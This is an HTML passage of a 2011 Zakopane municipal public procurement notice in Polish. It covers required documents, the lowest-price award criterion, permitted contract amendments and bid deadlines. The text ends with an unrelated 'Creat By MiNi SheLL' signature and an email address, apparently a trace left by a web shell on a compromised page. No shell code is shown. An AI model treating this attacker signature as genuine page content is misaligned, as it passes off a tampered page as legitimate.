<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ma załączyć do oferty wypełnioną Ofertową Tabelę Elementów   
             Rozliczeniowych I Prac Projektowych (TERIPP) określającą ceny jednostkowe brutto  
             elementów asortymentu robót, wg wzoru załączonego do SIWZ- stanowiącego  
             załącznik nr 9</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>32.1. W oparciu o art.144 ust.1 ustawy zamawiający informuje, że przewiduje   
           możliwość zmiany umowy :
32.1.1.	Zmiany danych teleadresowych, osób reprezentujących firmę, kluczowych specjalistów (inspektorów nadzoru) przedstawionych w umowie na inne legitymujące sie, co najmniej równoważonymi uprawnieniami, w przypadku ich śmierci, rezygnacji z pełnienia obowiązków, utraty uprawnień i.t.p.
32.1.2.	Zmian podwykonawcy, przy pomocy, którego Wykonawca realizuje przedmiot umowy.
32.1.3.	Rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy.
32.1.4.	Zmiany osoby /osób wskazanych w umowie, jako nadzorujących roboty.
32.1.5.	Zmiany terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie wystąpi lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
32.1.5.1.Zawieszenia robót przez Zamawiającego.
32.1.5.2.Szczególnie niesprzyjających warunków atmosferycznych,               
               uniemożliwiających prowadzenie robót zgodnie z STWiOR.
32.1.5.3.Zmian w dokumentacji dokonanych na wniosek Zamawiającego.
32.1.5.4.	n Opóźnienia przekazania terenu realizacji robót.
32.1.5.5.	Zmiany terminu dokonania odbioru robót przewidzianych w umowie.
32.1.5.6.	 Zatrzymania budowy w wyniku protestów mieszkańców.
32.1.5.7.	Odmiennych od przyjętych warunków geologicznych lub 
              geotechnicznych.
32.1.5.8.	Odmiennych od przyjętych warunków terenowych w szczególności istnienia niezinwentaryzowanej, infrastruktury podziemnej sieci, instalacji lub innych niezinwentaryzowanych obiektów budowlanych.
32.1.5.9.	Ujawnieniem w trakcie prowadzenia prac obiektów lub przedmiotów
 o charakterze archeologicznym.
32.1.5.10.	Siły wyższej.
32.1.5.11.	 Konieczności wprowadzenia uzgodnionych rozwiązań zamiennych 
w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego, odstępujących w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę 
i wymagających dopełnienia procedur art. 36a ust. 1 Prawa Budowlanego.
32.1.5.12.	Przekroczenia ustawowych terminów wydania przez organy administracji lub innych instytucji branżowych (dot. np. linii gazowych, telekomunikacyjnych, energetycznych) decyzji, zezwoleń, uzgodnień itp.
32.1.5.13.	Odmowy wydania przez w/w organy wymaganych decyzji, zezwoleń, uzgodnień itp.

32.1.6.	Zmiany sposobu realizacji przedmiotu zamówienia w postaci:
32.1.6.1.	Konieczności realizacji zamówienia przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w specyfikacjach, w przypadku gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem 
lub wadliwym wykonaniem zamówienia.
32.1.6.2.	Odmiennych od przyjętych w specyfikacjach warunków geologicznych skutkujących niemożnością zrealizowania przedmiotu zamówienia przy dotychczasowych założeniach technologicznych.
32.1.6.3.	Odmiennych od przyjętych w specyfikacjach warunków terenowych 
w szczególności istnienia niezinwentaryzowanej infrastruktury podziemnej sieci, instalacji lub innych niezinwentaryzowanych obiektów budowlanych skutkujących niemożnością zrealizowania przedmiotu zamówienia przy dotychczasowych założeniach technologicznych.
32.1.6.4.	Konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych ze względu na zmiany obowiązującego prawa.

32.1.7.	Zmian dokonanych w granicach przewidzianych w ustawie Prawo budowlane wynikających z:
32.1.7.1.	Wprowadzenia uzgodnionych rozwiązań zamiennych w stosunku 
do przewidzianych w projekcie budowlanym, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego, gdy zmiany dokonane zostały podczas wykonywania robót i nie odstępują w sposób istotny 
od zatwierdzonego projektu budowlanego lub warunków pozwolenia 
na budowę w ramach art. 36 a ust. 5 lub dokonane zostały zgodnie
 z zapisami art. 36a ust. 6 ustawy z zastrzeżeniem art. 57 ust. 2 ustawy Prawo budowlane.
32.1.7.2.	Wprowadzenia uzgodnionych rozwiązań zamiennych w stosunku 
do przewidzianych w projekcie budowlanym, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego, gdy zmiany dokonane zostały podczas wykonywania robót i odstępują w sposób istotny od zatwierdzonego projektu budowlanego lub warunków pozwolenia na budowę przy dopełnieniu procedur art. 36a ust. 1.
31.1.7.3.	 Wad dokumentacji projektowej, jeżeli takie ujawnią się podczas realizacji   
zadania ,pomimo  dołożenia wszelkiej staranności prze projektanta. 

31.1.8.	Zmiany wysokości wynagrodzenia - na wskutek rezygnacji z wykonania części robót wraz z określeniem maksymalnej wielkości tych robót i określeniem kwoty należnej 
za tą cześć w granicach udokumentowanego interesu Zamawiającego.

31.1.9.	Zmiany sposobu płatności w szczególności ilości faktur przejściowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Inwestycji pok.20
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2011 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok.8 
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com